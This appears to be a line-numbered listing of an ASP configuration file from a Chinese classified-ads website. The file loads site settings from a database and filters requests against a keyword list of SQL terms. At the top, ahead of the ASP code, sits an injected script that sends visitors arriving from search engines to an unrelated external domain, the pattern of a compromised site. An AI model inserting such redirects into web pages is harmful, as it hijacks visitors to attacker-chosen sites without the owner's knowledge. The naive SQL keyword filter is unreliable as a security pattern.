d:\wwwroot\wuchunhua\config.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="inc/function.asp"-->
002:
<%
003:
dim ThisPage,Pagesize,Allrecord,Allpage
004:
dim rsconfig,sqlconfig,title,web,about,hb,jf,logo,leixing,city,areas,area1,area2,area3,area4,area5,diqu1,jf_hb,tui_y,a_y,b_y,qqa,qqb,qqc,qqd,msn,emails,Tels,coryright,guan,kill,tnum,zinum,s_y,del_kqiqi,adclass,keys,adclass1,adclass2,adclass3,adclass4,adclass5,adclass6,adclass7,adclass8,ad,ad1,ad2,ad3,ad4,ad5,ad6,ad7,ad8,ad9,ad10,ad11,ad12,delpass1
005:
dim mailsmtp,mailform,mailname,mailpass,webgate,userreg,userlog,metades,metakey,close
006:
set rsconfig=server.createobject("adodb.recordset")
007:
sqlconfig = "select * from config "
008:
rsconfig.open sqlconfig,conn,1,1
009:
if rsconfig.eof or rsconfig.BOF then
010:
response.write "未知数据错误!"
011:
response.write "<meta http-equiv=refresh content=""2;URL=index.asp"">"
012:
response.end
013:
end if
014:
015:
title=rsconfig("title")
016:
web=rsconfig("web")
017:
logo=rsconfig("logo")
018:
about=rsconfig("about")
019:
city=rsconfig("city")
020:
diqu=rsconfig("diqu")
021:
diqu1=rsconfig("diqu1")
022:
areas=rsconfig("areas")
023:
area1=rsconfig("area1")
024:
area2=rsconfig("area2")
025:
area3=rsconfig("area3")
026:
area4=rsconfig("area4")
027:
area5=rsconfig("area5")
028:
leixing=rsconfig("leixing")
029:
metades=rsconfig("metades")
030:
metakey=rsconfig("metakey")
031:
coryright=HtmlEncodex(rsconfig("coryright"))
032:
kill=rsconfig("kill")
033:
guan=rsconfig("guan")
034:
webgate=rsconfig("webgate")
035:
userreg=rsconfig("userreg")
036:
userlog=rsconfig("userlog")
037:
tnum=rsconfig("tnum")
038:
zinum=rsconfig("zinum")
039:
hb=rsconfig("hb")
040:
jf=rsconfig("jf")
041:
jf_hb=rsconfig("jf_hb")
042:
tui_y=rsconfig("tui_y")
043:
a_y=rsconfig("a_y")
044:
b_y=rsconfig("b_y")
045:
s_y=rsconfig("s_y")
046:
qqa=rsconfig("qqa")
047:
qqb=rsconfig("qqb")
048:
qqc=rsconfig("qqc")
049:
qqd=rsconfig("qqd")
050:
msn=rsconfig("msn")
051:
emails=rsconfig("emails")
052:
Tels=rsconfig("Tels")
053:
del_kqiqi=rsconfig("del_kqiqi")
054:
ad=rsconfig("ad")
055:
adclass=HtmlEncodex(rsconfig("adclass"))
056:
adclass1=HtmlEncodex(rsconfig("adclass1"))
057:
adclass2=HtmlEncodex(rsconfig("adclass2"))
058:
adclass3=HtmlEncodex(rsconfig("adclass3"))
059:
adclass4=HtmlEncodex(rsconfig("adclass4"))
060:
adclass5=HtmlEncodex(rsconfig("adclass5"))
061:
adclass6=HtmlEncodex(rsconfig("adclass6"))
062:
adclass7=HtmlEncodex(rsconfig("adclass7"))
063:
adclass8=HtmlEncodex(rsconfig("adclass8"))
064:
keys=rsconfig("keys")
065:
ad1=split(rsconfig("ad1"),"|")
066:
ad2=split(rsconfig("ad2"),"|")
067:
ad3=split(rsconfig("ad3"),"|")
068:
ad4=split(rsconfig("ad4"),"|")
069:
ad5=split(rsconfig("ad5"),"|")
070:
ad6=split(rsconfig("ad6"),"|")
071:
ad7=split(rsconfig("ad7"),"|")
072:
ad8=split(rsconfig("ad8"),"|")
073:
ad9=split(rsconfig("ad9"),"|")
074:
ad10=split(rsconfig("ad10"),"|")
075:
ad11=split(rsconfig("ad11"),"|")
076:
077:
adm1=split(rsconfig("adm1"),"|")
078:
adm2=split(rsconfig("adm2"),"|")
079:
adm3=split(rsconfig("adm3"),"|")
080:
081:
adf1=split(rsconfig("adf1"),"|")
082:
adf2=split(rsconfig("adf2"),"|")
083:
adf3=split(rsconfig("adf3"),"|")
084:
adf4=split(rsconfig("adf4"),"|")
085:
adf5=split(rsconfig("adf5"),"|")
086:
087:
mailsys=split(rsconfig("mailsys"),"|")
088:
mailsmtp=mailsys(0)
089:
mailform=mailsys(1)
090:
mailname=mailsys(2)
091:
mailpass=mailsys(3)
092:
delpass1=rsconfig("delpass")
093:
rsconfig=close
094:
set rsconfig=nothing
095:
096:
'网站关于数量的设置
097:
'首页
098:
cm1=10 '最活跃商家数量
099:
cm2=8 '信息分类数量
100:
cm3=4 '分类信息展示行数
101:
cm4=4 '分类信息展示条数
102:
cm5=10 '分类信息每条字数
103:
cm6=12 ' 便民查询数量
104:
cm7=6 '首页分类显示行数
105:
cm8=10 ' 网站公告数量
106:
cm9=10 '行业新闻数量
107:
108:
109:
'--------SQL防注入定义部份------------------
110:
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh
111:
Fy_In = "join|union|like|modify|cast|drop|exec|insert|select|delete|or|update|count|alter|rename|chr|mid|truncate|char|declare|and|"&kill&"|迷药"
112:
Fy_Inf = split(Fy_In,"|")
113:
'--------POST部份------------------
114:
If Request.Form<>"" Then
115:
For Each Fy_Post In Request.Form
116:
For Fy_Xh=0 To Ubound(Fy_Inf)
117:
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
118:
Response.Write "<Script Language=JavaScript>alert('"&title&"提示您↓\n\n请不要发布和查询不良信息!');history.back();</Script>"
119:
Response.End
120:
End If
121:
Next
122:
Next
123:
End If
124:
125:
'--------GET部份-------------------
126:
If Request.QueryString<>"" Then
127:
For Each Fy_Get In Request.QueryString
128:
For Fy_Xh=0 To Ubound(Fy_Inf)
129:
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
130:
Response.Write "<Script Language=JavaScript>alert('"&title&"提示您↓\n\n请不要发布和查询不良信息!');history.back();</Script>"
131:
Response.End
132:
End If
133:
Next
134:
Next
135:
End If
136:
%
>
137:
138: